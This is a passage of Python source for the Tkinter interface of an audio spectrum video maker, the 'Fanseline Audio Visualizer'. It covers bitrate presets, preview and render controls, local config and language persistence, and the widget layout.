use_glow=param_dict[\"use_glow\"],\n bg_mode=param_dict[\"bg_mode\"], rotate=param_dict[\"rotate\"])\n fb.setAudioInfo(normal=param_dict[\"normal\"], br_kbps=param_dict[\"br_kbps\"])\n\n\ndef getDefaultBR(width, height, fps, quality=3):\n if quality == 5:\n return 20 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 4:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 3:\n return 7 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 2:\n return 2 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 1:\n return (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 0:\n return 0.5 * (width * height * fps) / (1920 * 1080 * 30)\n else:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n\n\ndef showPreview():\n global fb\n if not isRunning:\n saveConfig()\n setBlender(getAllValues())\n\n def _showPreview():\n global frame2, root_view\n frame2.imshow(fb.previewBackground())\n if not frame2.winfo_viewable():\n root_view.deiconify()\n\n th_preview = threading.Thread(target=_showPreview)\n th_preview.setDaemon(True)\n th_preview.start()\n else:\n global root_view\n if not root_view.winfo_viewable():\n root_view.deiconify()\n\n\ndef startBlending():\n global fb\n vdic = getAllValues()\n if vdic[\"sound_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct audio file!\"])\n return\n if vdic[\"output_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct output path!\"])\n return\n if vdic[\"filename\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please input the corrent file name!\"])\n return\n\n if not isRunning:\n setBlender(vdic)\n if os.path.exists(fb.getOutputPath()):\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to overwrite this file?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n showPreview()\n clearLog()\n saveConfig()\n th_blend = threading.Thread(target=fb.runBlending)\n th_blend.setDaemon(True)\n th_blend.start()\n else:\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to stop blending?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n clog(lang[\"Stop Blending...\"] + \"\\n\")\n fb.isRunning = False\n\n\ndef presetVideo(*args):\n global video_dic, list_presetv, tk_width, tk_height, tk_fps, tk_br_video\n w, h, fps, brv = video_dic[list_presetv.get()]\n tk_width.set(w)\n tk_height.set(h)\n tk_fps.set(fps)\n tk_br_video.set(round(brv * 100) / 100)\n fastPreview()\n\n\ndef presetAudio(*args):\n global audio_dic, tk_br_audio, tk_fq_low, tk_fq_high, tk_audio_normal, tk_scalar, tk_smooth\n bra, low, up, normal, scale, smooth = audio_dic[list_preseta.get()]\n tk_br_audio.set(bra)\n tk_fq_low.set(low)\n tk_fq_high.set(up)\n tk_audio_normal.set(normal)\n tk_scalar.set(scale)\n tk_smooth.set(smooth)\n\n\ndef saveConfig():\n vdic = getAllValues()\n try:\n directory = os.path.dirname(\"./Source/\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open('./Source/config.pickle', 'wb') as handle:\n pickle.dump(vdic, handle, protocol=pickle.HIGHEST_PROTOCOL)\n except:\n clog(lang[\"Error! Cannot save config!\"])\n\n\ndef loadConfig():\n try:\n with open('./Source/config.pickle', 'rb') as handle:\n vdic = pickle.load(handle)\n except:\n print(\"No config\")\n saveConfig()\n return\n\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, label_mp4, \\\n style_dic, tk_saturation, tk_text_brt\n\n def fileCheck(dicv, tk_value):\n try:\n path = vdic[dicv]\n if path is not None and os.path.exists(path):\n tk_value.set(path)\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def strCheck(dicv, tk_value, trunc=False):\n try:\n strv = vdic[dicv]\n if strv is not None:\n if not trunc:\n tk_value.set(strv)\n else:\n tk_value.set(\"\".join(strv.split(\".\")[:-1]))\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def numCheck(dicv, tk_value):\n try:\n num = vdic[dicv]\n if num is not None:\n tk_value.set(num)\n else:\n tk_value.set(0)\n except:\n pass\n\n fileCheck(\"image_path\", tk_image_path)\n fileCheck(\"sound_path\", tk_sound_path)\n fileCheck(\"bg_path\", tk_bg_path)\n fileCheck(\"logo_path\", tk_logo_path)\n fileCheck(\"output_path\", tk_output_path)\n strCheck(\"filename\", tk_filename, True)\n strCheck(\"text\", tk_text)\n fileCheck(\"font\", tk_font)\n numCheck(\"bins\", tk_bins)\n numCheck(\"lower\", tk_fq_low)\n numCheck(\"upper\", tk_fq_high)\n numCheck(\"scalar\", tk_scalar)\n numCheck(\"width\", tk_width)\n numCheck(\"height\", tk_height)\n numCheck(\"fps\", tk_fps)\n numCheck(\"br_Mbps\", tk_br_video)\n numCheck(\"br_kbps\", tk_br_audio)\n numCheck(\"normal\", tk_audio_normal)\n numCheck(\"bright\", tk_bright)\n numCheck(\"saturation\", tk_saturation)\n numCheck(\"blur_bg\", tk_blur_bg)\n numCheck(\"use_glow\", tk_use_glow)\n numCheck(\"smooth\", tk_smooth)\n numCheck(\"relsize\", tk_relsize)\n numCheck(\"text_brt\", tk_text_brt)\n numCheck(\"linewidth\", tk_linewidth)\n numCheck(\"rotate\", tk_rotate)\n\n try:\n if vdic[\"color\"] is not None:\n color_prev = None\n for cname, ccode in color_dic.items():\n if ccode == vdic[\"color\"]:\n color_prev = cname\n break\n if color_prev is not None:\n tk_color.set(color_prev)\n except:\n pass\n\n try:\n if vdic[\"blur_bg\"] is not None and vdic[\"bg_mode\"] is not None:\n if vdic[\"bg_mode\"] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n for bname, values in bg_mode_dic.items():\n if values == [vdic[\"blur_bg\"], vdic[\"bg_mode\"]]:\n tk_bg_mode.set(bname)\n except:\n pass\n\n try:\n if vdic[\"style\"] is not None:\n for sname, scode in style_dic.items():\n if scode == vdic[\"style\"]:\n tk_style.set(sname)\n break\n except:\n pass\n\n entry_img.xview(\"end\")\n entry_logo.xview(\"end\")\n entry_bg.xview(\"end\")\n entry_fname.xview(\"end\")\n entry_audio.xview(\"end\")\n entry_output.xview(\"end\")\n entry_font.xview(\"end\")\n\n\ndef saveLanguage():\n global lang, lang_code\n with open('./Source/language.pickle', 'wb') as handle:\n pickle.dump(lang_code, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef loadLanguage():\n global lang, lang_code\n lang_code = \"en\"\n try:\n with open('./Source/language.pickle', 'rb') as handle:\n lang_code = pickle.load(handle)\n except:\n print(\"No language config\")\n\n if lang_code == \"cn_s\":\n lang = lang_cn_s\n else:\n lang = lang_en\n\n\ndef resetGUI(*args):\n global lang_code, exit_flag, root, list_lang\n # lang_code = lc\n if list_lang.get() == \"简体中文\":\n lang_code = \"cn_s\"\n else:\n lang_code = \"en\"\n saveConfig()\n saveLanguage()\n exit_flag = False\n root.destroy()\n\n\ndef setFileType(*args):\n global label_mp4, bg_mode_dic, tk_bg_mode\n try:\n if bg_mode_dic[tk_bg_mode.get()][1] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n except:\n pass\n\n\ndef fastPreview(*args):\n global frame2, old_vdic\n if frame2 and frame2.winfo_viewable():\n vdic = getAllValues()\n if vdic != old_vdic:\n showPreview()\n\n\ndef shortCut(event):\n if event.keysym == \"F5\":\n startBlending()\n if event.keysym == \"F4\":\n showPreview()\n\n\ndef bindPreview(tk_obj):\n tk_obj.trace(\"w\", lambda name, index, mode=tk_obj: fastPreview())\n\n\nif __name__ == '__main__':\n exit_flag = False\n GUI_WIDTH = 950\n GUI_HEIGHT = 700\n while not exit_flag:\n exit_flag = True\n\n root = tk.Tk()\n loadLanguage()\n\n old_vdic = None\n tk_image_path = tk.StringVar(value=\"./Source/fallback.png\")\n tk_sound_path = tk.StringVar()\n tk_logo_path = tk.StringVar(value=\"./Source/Logo.png\")\n tk_bg_path = tk.StringVar(value=\"\")\n tk_output_path = tk.StringVar()\n tk_filename = tk.StringVar(value=\"output\")\n\n tk_text = tk.StringVar()\n tk_font = tk.StringVar(value=\"./Source/font.otf\")\n tk_relsize = tk.DoubleVar(value=1.0)\n bindPreview(tk_relsize)\n tk_text_brt = tk.DoubleVar(value=1.0)\n bindPreview(tk_text_brt)\n\n tk_bins = tk.IntVar(value=80)\n bindPreview(tk_bins)\n\n tk_fq_low = tk.IntVar()\n tk_fq_high = tk.IntVar()\n tk_scalar = tk.DoubleVar()\n tk_color = tk.StringVar()\n bindPreview(tk_color)\n tk_bright = tk.DoubleVar(value=0.8)\n bindPreview(tk_bright)\n tk_saturation = tk.DoubleVar(value=0.8)\n bindPreview(tk_saturation)\n tk_smooth = tk.IntVar()\n tk_linewidth = tk.DoubleVar(value=1.0)\n bindPreview(tk_linewidth)\n tk_style = tk.StringVar()\n bindPreview(tk_style)\n\n tk_bg_mode = tk.StringVar()\n bindPreview(tk_bg_mode)\n tk_blur_bg = tk.BooleanVar(value=True)\n bindPreview(tk_blur_bg)\n tk_use_glow = tk.BooleanVar(value=False)\n bindPreview(tk_use_glow)\n tk_rotate = tk.DoubleVar(value=0)\n\n tk_width = tk.IntVar()\n tk_height = tk.IntVar()\n tk_fps = tk.DoubleVar()\n tk_br_video = tk.DoubleVar()\n tk_br_audio = tk.IntVar()\n tk_audio_normal = tk.BooleanVar()\n\n tk_preseta = tk.StringVar()\n tk_presetv = tk.StringVar()\n\n tk_lang = tk.StringVar()\n\n isRunning = False\n\n fb = FanBlender()\n\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n root.bind('', shortCut)\n canvas = tk.Canvas(root, width=GUI_WIDTH, height=GUI_HEIGHT)\n canvas.pack()\n frame1 = tk.Frame(master=root)\n frame1.place(relx=0, rely=0, relwidth=1, relheight=1, anchor='nw')\n\n root_view = tk.Toplevel(root)\n root_view.title(lang[\"Preview\"])\n root_view.withdraw()\n canvas = tk.Canvas(root_view, width=GUI_WIDTH // 2, height=GUI_HEIGHT // 2)\n canvas.pack()\n frame2 = ImageViewer(root_view)\n frame2.setGUI(GUI_WIDTH * 2 / 3, GUI_HEIGHT)\n frame2.setLanguage(lang)\n\n rely, devy = 0.01, 0.06\n relh = 0.04\n\n label_lang = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Language/语言:\"), anchor=\"e\")\n label_lang.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_lang = ttk.Combobox(master=frame1, textvariable=tk_lang, state=\"readonly\")\n list_lang[\"values\"] = (\"English\", \"简体中文\")\n if lang_code == \"cn_s\":\n list_lang.current(1)\n else:\n list_lang.current(0)\n list_lang.place(relwidth=0.1, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n list_lang.bind(\"<>\", resetGUI)\n\n label_preseta = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio Preset:\"]), anchor=\"e\")\n label_preseta.place(relwidth=0.1, relheight=relh, relx=0.25, rely=rely, anchor='nw')\n list_preseta = ttk.Combobox(master=frame1, textvariable=tk_preseta, state=\"readonly\")\n audio_dic = {\n lang[\"Music-HQ\"] + \" (320k)\": [320, 20, 2500, False, 1.0, 2],\n lang[\"Music-MQ\"] + \" (128k)\": [128, 20, 2500, False, 1.0, 2],\n lang[\"Music-LQ\"] + \" (48k)\": [48, 20, 2500, False, 1.0, 2],\n lang[\"Voice-HQ\"] + \" (320k)\": [320, 20, 2500, True, 1.0, 5],\n lang[\"Voice-MQ\"] + \" (128k)\": [128, 40, 2200, True, 1.0, 5],\n lang[\"Voice-LQ\"] + \" (48k)\": [48, 80, 2000, True, 1.0, 5],\n }\n list_preseta[\"values\"] = dict2tuple(audio_dic)\n list_preseta.current(0)\n list_preseta.bind(\"<>\", presetAudio)\n presetAudio()\n list_preseta.set(lang[\"-Please Select-\"])\n list_preseta.place(relwidth=0.14, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n\n label_presetv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Preset:\"]), anchor=\"e\")\n label_presetv.place(relwidth=0.1, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n list_presetv = ttk.Combobox(master=frame1, textvariable=tk_presetv, state=\"readonly\")\n video_dic = {\n lang[\"Square\"] + \" (1080x1080)\": [1080, 1080, 30, getDefaultBR(1080, 1080, 30, 5)],\n lang[\"Square\"] + \" (1024x1024)\": [1024, 1024, 30, getDefaultBR(1024, 1024, 30, 5)],\n lang[\"Square\"] + \" (720x720)\": [720, 720, 30, getDefaultBR(720, 720, 30, 4)],\n lang[\"Square\"] + \" (512x512)\": [512, 512, 30, getDefaultBR(512, 512, 30, 4)],\n lang[\"Square\"] + \" (480x480)\": [480, 480, 30, getDefaultBR(480, 480, 30, 4)],\n lang[\"Landscape\"] + \" (1920x1080)\": [1920, 1080, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Landscape\"] + \" (1280x720)\": [1280, 720, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Landscape\"] + \" (854x480)\": [854, 480, 30, getDefaultBR(854, 480, 30, 4)],\n lang[\"Portrait\"] + \" (1080x1920)\": [1080, 1920, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Portrait\"] + \" (720x1280)\": [720, 1280, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Portrait\"] + \" (480x854)\": [480, 854, 30, getDefaultBR(854, 480, 30, 4)],\n \"2k (2560x1440)\": [2560, 1440, 30, getDefaultBR(2560, 1440, 30, 5)],\n }\n list_presetv[\"values\"] = dict2tuple(video_dic)\n list_presetv.current(4)\n list_presetv.bind(\"<>\", presetVideo)\n presetVideo()\n list_presetv.set(lang[\"-Please Select-\"])\n list_presetv.place(relwidth=0.19, relheight=relh, relx=0.6, rely=rely, anchor='nw')\n\n btn_prev = tk.Button(master=frame1, text=lang[\"Preview\"], command=showPreview)\n btn_prev.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_audio = tk.Entry(master=frame1, textvariable=tk_sound_path)\n entry_audio.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_audio = tk.Button(master=frame1, text=lang[\"Audio (REQUIRED)\"], command=selectAudio)\n btn_audio.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_img = tk.Entry(master=frame1, textvariable=tk_image_path)\n entry_img.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_img = tk.Button(master=frame1, text=lang[\"Foreground Image\"], command=selectImage)\n btn_img.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_bg = tk.Entry(master=frame1, textvariable=tk_bg_path)\n entry_bg.place(relwidth=0.28, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_bg = tk.Button(master=frame1, text=lang[\"Background Image\"], command=selectBG)\n btn_bg.place(relwidth=0.15, relheight=relh, relx=0.34, rely=rely, anchor='nw')\n\n entry_logo = tk.Entry(master=frame1, textvariable=tk_logo_path)\n entry_logo.place(relwidth=0.29, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n btn_logo = tk.Button(master=frame1, text=lang[\"Logo File\"], command=selectLogo)\n btn_logo.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_textplz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Your Text:\"]), anchor=\"e\")\n label_textplz.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_text = tk.Entry(master=frame1, textvariable=tk_text)\n entry_text.place(relwidth=0.18, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_text.bind(\"\", fastPreview)\n entry_text.bind('', fastPreview)\n tk_text.set(\"Hello World!\")\n\n label_text_brt = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Text Brt.:\"]), anchor=\"e\")\n label_text_brt.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_text_brt = ttk.Combobox(master=frame1, textvariable=tk_text_brt)\n entry_text_brt[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_text_brt.current(0)\n entry_text_brt.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_font = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Font Size:\"]), anchor=\"e\")\n label_font.place(relwidth=0.08, relheight=relh, relx=0.51, rely=rely, anchor='nw')\n\n entry_relsize = ttk.Combobox(master=frame1, textvariable=tk_relsize)\n entry_relsize[\"values\"] = (3.0, 2.8, 2.5, 2.2, 2.0, 1.8, 1.5, 1.2, 1.0, 0.8, 0.5)\n entry_relsize.current(8)\n entry_relsize.place(relwidth=0.05, relheight=relh, relx=0.59, rely=rely, anchor='nw')\n\n entry_font = tk.Entry(master=frame1, textvariable=tk_font)\n entry_font.place(relwidth=0.14, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n btn_font = tk.Button(master=frame1, text=lang[\"Font File\"], command=selectFont)\n btn_font.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_size = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Size:\"]), anchor=\"e\")\n label_size.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_width = tk.Entry(master=frame1, textvariable=tk_width)\n entry_width.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_width.bind(\"\", fastPreview)\n entry_width.bind('', fastPreview)\n\n label_mul = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"x\"))\n label_mul.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n\n entry_height = tk.Entry(master=frame1, textvariable=tk_height)\n entry_height.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n entry_height.bind(\"\", fastPreview)\n entry_height.bind('', fastPreview)\n\n label_fps = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"FPS:\"]), anchor=\"e\")\n label_fps.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_fps = ttk.Combobox(master=frame1, textvariable=tk_fps)\n entry_fps[\"values\"] = (60.0, 50.0, 30.0, 25.0, 20.0, 15.0)\n entry_fps.current(2)\n entry_fps.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_brv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video BR (Mbps):\"]), anchor=\"e\")\n label_brv.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_brv = tk.Entry(master=frame1, textvariable=tk_br_video)\n entry_brv.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n btn_autob = tk.Button(master=frame1, text=lang[\"Auto Bit Rate\"], command=autoBitrate)\n btn_autob.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_bra = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio BR:\"]), anchor=\"e\")\n label_bra.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_bra = ttk.Combobox(master=frame1, textvariable=tk_br_audio)\n list_bra[\"values\"] = (320, 256, 192, 128, 96, 64, 48)\n list_bra.current(0)\n list_bra.place(relwidth=0.08, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_kbps = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Kbps\"), anchor=\"w\")\n label_kbps.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n\n check_normal = tk.Checkbutton(master=frame1, text=lang[\"Normalize Volume\"],\n variable=tk_audio_normal, onvalue=True, offvalue=False, anchor=\"e\")\n check_normal.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n\n label_bg_mode = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"BG Mode:\"]), anchor=\"e\")\n label_bg_mode.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_bg_mode = ttk.Combobox(master=frame1, textvariable=tk_bg_mode, state=\"readonly\")\n bg_mode_dic = {\n lang[\"Blurred BG Image\"]: [True, 0],\n lang[\"Normal BG Image\"]: [False, 0],\n lang[\"Blurred BG Only\"]: [True, 2],\n lang[\"Normal BG Only\"]: [False, 2],\n lang[\"Transparent\"]: [False, -1],\n lang[\"Spectrum Only\"]: [False, -2],\n }\n\n list_bg_mode[\"values\"] = dict2tuple(bg_mode_dic)\n list_bg_mode.current(0)\n list_bg_mode.bind(\"<>\", setFileType)\n list_bg_mode.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_range = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Analyze Freq:\"]), anchor=\"e\")\n label_range.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_low = tk.Entry(master=frame1, textvariable=tk_fq_low)\n entry_low.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_to = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"to\"]))\n label_to.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n entry_up = tk.Entry(master=frame1, textvariable=tk_fq_high)\n entry_up.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n label_hz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Hz\"]), anchor=\"w\")\n label_hz.place(relwidth=0.03, relheight=relh, relx=0.28, rely=rely, anchor='nw')\n\n label_bins = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Num:\"]), anchor=\"e\")\n label_bins.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_bins = ttk.Combobox(master=frame1, textvariable=tk_bins)\n entry_bins[\"values\"] = (6, 12, 18, 24, 36, 48, 60, 72, 84, 96, 108, 120)\n entry_bins.current(5)\n entry_bins.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_scalar = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Scalar:\"]), anchor=\"e\")\n label_scalar.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_scalar = ttk.Combobox(master=frame1, textvariable=tk_scalar)\n entry_scalar[\"values\"] = (0.05, 0.1, 0.2, 0.5, 0.7, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)\n entry_scalar.current(5)\n entry_scalar.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_color = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Hue:\"]), anchor=\"e\")\n label_color.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_color = ttk.Combobox(master=frame1, textvariable=tk_color, state=\"readonly\")\n\n color_dic = {\n lang[\"Rainbow 4x\"]: \"color4x\",\n lang[\"Rainbow 2x\"]: \"color2x\",\n lang[\"Rainbow 1x\"]: \"color1x\",\n lang[\"White\"]: \"white\",\n lang[\"Black\"]: \"black\",\n lang[\"Gray\"]: \"gray\",\n lang[\"Red\"]: \"red\",\n lang[\"Green\"]: \"green\",\n lang[\"Blue\"]: \"blue\",\n lang[\"Yellow\"]: \"yellow\",\n lang[\"Magenta\"]: \"magenta\",\n lang[\"Purple\"]: \"purple\",\n lang[\"Cyan\"]: \"cyan\",\n lang[\"Light Green\"]: \"lightgreen\",\n lang[\"Green - Blue\"]: \"green-blue\",\n lang[\"Magenta - Purple\"]: \"magenta-purple\",\n lang[\"Red - Yellow\"]: \"red-yellow\",\n lang[\"Yellow - Green\"]: \"yellow-green\",\n lang[\"Blue - Purple\"]: \"blue-purple\",\n }\n\n list_color[\"values\"] = dict2tuple(color_dic)\n list_color.current(0)\n list_color.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n\n label_style = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Style:\"]), anchor=\"e\")\n label_style.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_style = ttk.Combobox(master=frame1, textvariable=tk_style)\n\n style_dic = {\n lang[\"Solid Line\"]: 0,\n lang[\"Dot Line\"]: 1,\n lang[\"Single Dot\"]: 2,\n lang[\"Double Dot\"]: 7,\n lang[\"Concentric\"]: 8,\n lang[\"Line Graph\"]: 17,\n lang[\"Classic 1\"]: 9,\n lang[\"Classic 2\"]: 10,\n lang[\"Classic 3\"]: 15,\n lang[\"Classic 4\"]: 16,\n lang[\"Classic Dot 1\"]: 11,\n lang[\"Classic Dot 2\"]: 12,\n lang[\"Classic Dot 3\"]: 13,\n lang[\"Classic Dot 4\"]: 14,\n lang[\"Stem Plot 1\"]: 3,\n lang[\"Stem Plot 2\"]: 4,\n lang[\"Stem Plot 3\"]: 5,\n lang[\"Stem Plot 4\"]: 6,\n lang[\"No Spectrum\"]: -1,\n }\n list_style[\"values\"] = dict2tuple(style_dic)\n list_style[\"state\"] = \"readonly\"\n list_style.current(0)\n list_style.place(relwidth=0.13, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n\n label_linewidth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Line Width:\"]), anchor=\"e\")\n label_linewidth.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_linewidth = ttk.Combobox(master=frame1, textvariable=tk_linewidth)\n entry_linewidth[\"values\"] = (\n 15.0, 12.0, 10.0, 8.0, 6.0, 5.0, 4.0, 3.0, 2.0, 1.5, 1.2, 1.0, 0.8, 0.6, 0.5, 0.4, 0.3)\n entry_linewidth.current(11)\n entry_linewidth.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_smooth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Stabilize:\"]), anchor=\"e\")\n label_smooth.place(relwidth=0.15, relheight=relh, relx=0.50, rely=rely, anchor='nw')\n list_smooth = ttk.Combobox(master=frame1, textvariable=tk_smooth)\n list_smooth[\"values\"] = (0, 1, 2, 3, 5, 6, 7, 8, 9, 10)\n list_smooth.current(0)\n list_smooth.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_saturation = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Sat.:\"]), anchor=\"e\")\n label_saturation.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_saturation = ttk.Combobox(master=frame1, textvariable=tk_saturation)\n entry_saturation[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_saturation.current(4)\n entry_saturation.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_rotate = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spin FG(rpm):\"]), anchor=\"e\")\n label_rotate.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n entry_rotate = ttk.Combobox(master=frame1, textvariable=tk_rotate)\n entry_rotate[\"values\"] = (6.0, 5.0, 4.0, 3.0, 2.0, 1.0, 0.0, - 1.0, -2.0, -3.0, -4.0, -5.0, -6.0)\n entry_rotate.current(6)\n entry_rotate.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n check_use_glow = tk.Checkbutton(master=frame1, text=lang[\"Glow Effect (SLOW)\"],\n variable=tk_use_glow, onvalue=True, offvalue=False, anchor=\"e\")\n check_use_glow.place(relwidth=0.15, relheight=relh, relx=0.55, rely=rely, anchor='nw')\n\n label_bright = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Brt.:\"]), anchor=\"e\")\n label_bright.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_bright = ttk.Combobox(master=frame1, textvariable=tk_bright)\n entry_bright[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_bright.current(4)\n entry_bright.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n scr = scrolledtext.ScrolledText(master=frame1, width=20, height=10)\n scr.place(relwidth=0.9, relheight=relh * 6.5, relx=0.05, rely=rely, anchor='nw')\n\n rely += relh * 6.8\n\n entry_output = tk.Entry(master=frame1, textvariable=tk_output_path)\n entry_output.place(relwidth=0.44, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_fname = tk.Entry(master=frame1, textvariable=tk_filename)\n entry_fname.place(relwidth=0.25, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n label_mp4 = tk.Label(master=frame1, text=\".mp4\", anchor=\"w\")\n label_mp4.place(relwidth=0.05, relheight=relh, relx=0.75, rely=rely, anchor='nw')\n btn_output = 